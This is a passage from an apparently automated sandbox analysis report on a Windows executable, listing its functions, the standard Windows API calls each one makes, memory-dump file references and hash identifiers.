                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: HandleModule$AddressChangeFilterMessageProcWindow
                                                                                    • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                                                    • API String ID: 989041661-2676053874
                                                                                    • Opcode ID: a7f6f2e5f8f57a6afa57f5accac88337017fdea6f4c9c9ed7d5e2355f95595c0
                                                                                    • Instruction ID: 26a363f38c9b500d63c7b8355889e9a68f3a4e891c8784958a891250910d6643
                                                                                    • Opcode Fuzzy Hash: a7f6f2e5f8f57a6afa57f5accac88337017fdea6f4c9c9ed7d5e2355f95595c0
                                                                                    • Instruction Fuzzy Hash: 1CF027706093149FD704ABA9BCC4F853F99FB8D351F00152EF204C6581CBB80C808EA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004698F4, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 107COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(00000000,00469A44,?,?,00443D44,00000001), ref: 00469982
                                                                                      • Part of subcall function 0042369C: CreateFileW.KERNEL32(00000000,000000F0,000000F0,00000000,00000003,00000080,00000000,?,?,00443D44,004699C4,00000000,00469A44,?,?,00443D44), ref: 004236EB
                                                                                      • Part of subcall function 00423BC8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?,?,?,?,00443D44,004699DF,00000000,00469A44,?,?,00443D44,00000001), ref: 00423BEB
                                                                                    • GetLastError.KERNEL32(00000000,00469A44,?,?,00443D44,00000001), ref: 004699E9
                                                                                      • Part of subcall function 00427D4C: FormatMessageW.KERNEL32(00003300,00000000,00000000,00000000,00000001,00000000,00000000,?,00443D44,00000000,?,004699F8,00000000,00469A44), ref: 00427D70
                                                                                      • Part of subcall function 00427D4C: LocalFree.KERNEL32(00000001,00427DC9,00003300,00000000,00000000,00000000,00000001,00000000,00000000,?,00443D44,00000000,?,004699F8,00000000,00469A44), ref: 00427DBC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$CreateFileFormatFreeFullLocalMessageNamePath
                                                                                    • String ID: TUA$\UA
                                                                                    • API String ID: 503893064-4291284429
                                                                                    • Opcode ID: 16c3a7c1edecb1a6fb67f941cdccc39d2bbf5b553f33231be13615cc94cc8ccc
                                                                                    • Instruction ID: 8d929fe5fe5036276eb1cf3e5c1d8d9621af2457b238719d8755a1a314a4a9d0
                                                                                    • Opcode Fuzzy Hash: 16c3a7c1edecb1a6fb67f941cdccc39d2bbf5b553f33231be13615cc94cc8ccc
                                                                                    • Instruction Fuzzy Hash: 5841C370B002599FCB00EFA9D8815EEB7F5AF48314F50812AE514A7382DB7D5E059B6A
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040DE74, Relevance: 6.1, APIs: 4, Instructions: 95threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetThreadUILanguage.KERNEL32(?,00000000), ref: 0040DE85
                                                                                    • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 0040DEE3
                                                                                    • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 0040DF40
                                                                                    • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 0040DF73
                                                                                      • Part of subcall function 0040DE30: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,0040DEF1), ref: 0040DE47
                                                                                      • Part of subcall function 0040DE30: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,0040DEF1), ref: 0040DE64
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Thread$LanguagesPreferred$Language
                                                                                    • String ID:
                                                                                    • API String ID: 2255706666-0
                                                                                    • Opcode ID: 339f940500be62133d20186022ad95a148fb343104f844956e141825995a35fa
                                                                                    • Instruction ID: 6b3602698f867434315670786c57d1330f11e75d411b24415d78b62a36c3f300
                                                                                    • Opcode Fuzzy Hash: 339f940500be62133d20186022ad95a148fb343104f844956e141825995a35fa
                                                                                    • Instruction Fuzzy Hash: 6B316F70E1021A9BDB10DFE9C884AAEB7B5EF14304F40417AE555E72D1DB789A09CB94
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 005CD294, Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • MulDiv.KERNEL32(?,?,?), ref: 005CD2AD
                                                                                    • MulDiv.KERNEL32(?,005CD3DF,?), ref: 005CD2C0
                                                                                    • MulDiv.KERNEL32(?,?,?), ref: 005CD2D7
                                                                                    • MulDiv.KERNEL32(?,005CD3DF,?), ref: 005CD2F5
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d854f0a41b6c0be31f27ed2a2595d08c7a93b107329d657449771b3e36219948
                                                                                    • Instruction ID: 2647700dfaabd85a373208064ba8ef14f9f71db11805bddc88b4befc8354b4ba
                                                                                    • Opcode Fuzzy Hash: d854f0a41b6c0be31f27ed2a2595d08c7a93b107329d657449771b3e36219948
                                                                                    • Instruction Fuzzy Hash: 05113076A04214AFCB44DEDDD8C4E9B7BEDEF48360B1440A9F908DB242C634ED80C7A4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 005B9590, Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsWindowVisible.USER32 ref: 005B95A3
                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 005B95E5
                                                                                    • SetWindowLongW.USER32 ref: 005B95FF
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,C31852FF,?,00000000,?,005B96B9,?,?,?,00000000), ref: 005B9627
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Window$Long$Visible
                                                                                    • String ID:
                                                                                    • API String ID: 2967648141-0
                                                                                    • Opcode ID: cbd3c45b461b391437ba7066b1b61bcc809b1be27560bc9892573cc00352a45d
                                                                                    • Instruction ID: 5518093a597a3e42cc7efe86925244264c3f969ac261f295b92f519f6962ed08
                                                                                    • Opcode Fuzzy Hash: cbd3c45b461b391437ba7066b1b61bcc809b1be27560bc9892573cc00352a45d
                                                                                    • Instruction Fuzzy Hash: C3115E742451446FDB00DB38E989FEA7FE9AB44314F449191F984CB362CB38ED81CB54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0046A210, Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FindResourceW.KERNEL32(?,?,?,00444A48,?,00000001,00000000,?,0046A152,00000000,00000000,?,006D479C,?,?,006AB298), ref: 0046A227
                                                                                    • LoadResource.KERNEL32(?,0046A2AC,?,?,?,00444A48,?,00000001,00000000,?,0046A152,00000000,00000000,?,006D479C,?), ref: 0046A241
                                                                                    • SizeofResource.KERNEL32(?,0046A2AC,?,0046A2AC,?,?,?,00444A48,?,00000001,00000000,?,0046A152,00000000,00000000), ref: 0046A25B
                                                                                    • LockResource.KERNEL32(00469AF8,00000000,?,0046A2AC,?,0046A2AC,?,?,?,00444A48,?,00000001,00000000,?,0046A152,00000000), ref: 0046A265
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                    • String ID:
                                                                                    • API String ID: 3473537107-0
                                                                                    • Opcode ID: fc1199bd8b7576b79735118972852dd1a7e8ba42b3ca2b0218e849eb7ba95f41
                                                                                    • Instruction ID: 65ec82024f0050d62c5aa18a9d59af1631c7c5e859e50fdde1c6790020d80a24
                                                                                    • Opcode Fuzzy Hash: fc1199bd8b7576b79735118972852dd1a7e8ba42b3ca2b0218e849eb7ba95f41
                                                                                    • Instruction Fuzzy Hash: FBF081B36006046F4745EE9DA881D9B77ECEE89364310015FF908D7302EA39DD51477E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0060F9A0, Relevance: 6.0, APIs: 4, Instructions: 48registrywindowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RegDeleteValueW.ADVAPI32(?,00000000,?,00000002,00000000,?,?,?,?,0062AA5C), ref: 0060F9EA
                                                                                    • RegCloseKey.ADVAPI32(00000000,?,00000000,?,00000002,00000000,?,?,?,?,0062AA5C), ref: 0060F9F3
                                                                                    • RemoveFontResourceW.GDI32(00000000), ref: 0060FA00
                                                                                    • SendNotifyMessageW.USER32(0000FFFF,0000001D,00000000,00000000), ref: 0060FA14
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CloseDeleteFontMessageNotifyRemoveResourceSendValue
                                                                                    • String ID:
                                                                                    • API String ID: 261542597-0
                                                                                    • Opcode ID: 4d4d293d1f9dbc20c21e2411ca59a7708ade3ad13bf949b9de564e238f8cc3c4
                                                                                    • Instruction ID: dfbc53e8f1cdd66ec9ebb9bd66f4992ca480b4c62771c623e92dda120a3c2ed9
                                                                                    • Opcode Fuzzy Hash: 4d4d293d1f9dbc20c21e2411ca59a7708ade3ad13bf949b9de564e238f8cc3c4
                                                                                    • Instruction Fuzzy Hash: 98F0C87278430177D630B7B65C4BFAF128D4FC5744F60493DB604EB3C2D668D84142A9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0050E958, Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 0050E965
                                                                                    • GetCurrentProcessId.KERNEL32(?,00000000,00000000,005BA39A,?,?,00000000,00000001,005B8697,?,00000000,00000000,00000000,00000000), ref: 0050E96E
                                                                                    • GlobalFindAtomW.KERNEL32(00000000), ref: 0050E983
                                                                                    • GetPropW.USER32 ref: 0050E99A
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2582817389-0
                                                                                    • Opcode ID: d2063d6d394e8f62765d83b803eda28d99256e3f1fe5fb1cd52194ae8a2630a5
                                                                                    • Instruction ID: e102eef170da63bf505a6d713c1113ee4801a35bc19e545ba3a982a5f04e7684
                                                                                    • Opcode Fuzzy Hash: d2063d6d394e8f62765d83b803eda28d99256e3f1fe5fb1cd52194ae8a2630a5
                                                                                    • Instruction Fuzzy Hash: B3F0ECA160511167CF60BBB65C8787F5A8C9FC43D03351D2BF945DB182D924CC8142FE
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 006A4790, Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(00000008), ref: 006A4799
                                                                                    • OpenProcessToken.ADVAPI32(00000000,00000008), ref: 006A479F
                                                                                    • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008), ref: 006A47C1
                                                                                    • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008), ref: 006A47D2
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                    • String ID:
                                                                                    • API String ID: 215268677-0
                                                                                    • Opcode ID: 38c3b4d84d633f22a86344a5930ac08e8241369be101714da38fb162c330e58f
                                                                                    • Instruction ID: 10da8f8c74a3241f5e02fb80210d1ec53806dfcf86ee80de0044891c11e458d6
                                                                                    • Opcode Fuzzy Hash: 38c3b4d84d633f22a86344a5930ac08e8241369be101714da38fb162c330e58f
                                                                                    • Instruction Fuzzy Hash: 2AF0A0706043003BD300EAB58C82E9B37DCAF85711F00482DBA98C7280DA78ED489762
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004F5540, Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetDC.USER32(00000000), ref: 004F5549
                                                                                    • SelectObject.GDI32(00000000,058A00B4), ref: 004F555B
                                                                                    • GetTextMetricsW.GDI32(00000000,?,00000000,058A00B4,00000000), ref: 004F5566
                                                                                    • ReleaseDC.USER32 ref: 004F5577
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: MetricsObjectReleaseSelectText
                                                                                    • String ID:
                                                                                    • API String ID: 2013942131-0
                                                                                    • Opcode ID: 14fbe85bcd4cf3be47bb432825b68447d7e4ed233deadf784685ce309785678e
                                                                                    • Instruction ID: 658a988d36d71ce3bab16ef7ee104d6016508106ebe8fbf8f6d71eaa57139fcf
                                                                                    • Opcode Fuzzy Hash: 14fbe85bcd4cf3be47bb432825b68447d7e4ed233deadf784685ce309785678e
                                                                                    • Instruction Fuzzy Hash: 43E04871E169A433D61161662C42BEB25498F423A9F08111BFF44992D5DA0DCD4042FD
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0060EC98, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 0060ED34
                                                                                    • GetLastError.KERNEL32(00000000,0060ED7C,?,?,?,00000001), ref: 0060ED43
                                                                                      • Part of subcall function 005C61D8: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C61EB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: DirectoryErrorExecuteLastShellSystem
                                                                                    • String ID: <
                                                                                    • API String ID: 893404051-4251816714
                                                                                    • Opcode ID: 480ba7d80929159cff1dc9196e4ab957db805e1bfd706933b8e8c71d327d0e34
                                                                                    • Instruction ID: e241974b84c1913d27331e1b8670269cd021abd25e4475656a32ed52160d5831
                                                                                    • Opcode Fuzzy Hash: 480ba7d80929159cff1dc9196e4ab957db805e1bfd706933b8e8c71d327d0e34
                                                                                    • Instruction Fuzzy Hash: 76216B70A40219DFDB14EFA9C886ADE7BF9EF49344F50043AF804A72D1E7759A418B98
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 006B5B7E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 006B5BBE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Window
                                                                                    • String ID: /INITPROCWND=$%x $@
                                                                                    • API String ID: 2353593579-4169826103
                                                                                    • Opcode ID: a8f49e2eab2cae1c106e4680518f681a956298d62e733e87d233503d72d3a859
                                                                                    • Instruction ID: a54ba8f7f6fb51cac07e83dc6930cd9f58dc65c08491e71cf19d1336e0aa8d26
                                                                                    • Opcode Fuzzy Hash: a8f49e2eab2cae1c106e4680518f681a956298d62e733e87d233503d72d3a859
                                                                                    • Instruction Fuzzy Hash: F921C070A047098FCB00EBA4E891BFEBBF6EB89314F50447AE505D7291EB74A9448B54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 006B52AC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59processCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateProcessW.KERNEL32 ref: 006B5319
                                                                                    • CloseHandle.KERNEL32(006B53C4,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,006B5380,?,006B5370,00000000), ref: 006B5336
                                                                                      • Part of subcall function 006B5200: GetLastError.KERNEL32(00000000,006B529D,?,?,?), ref: 006B5223
                                                                                    Strings
                                                                                    Memory Dump Source
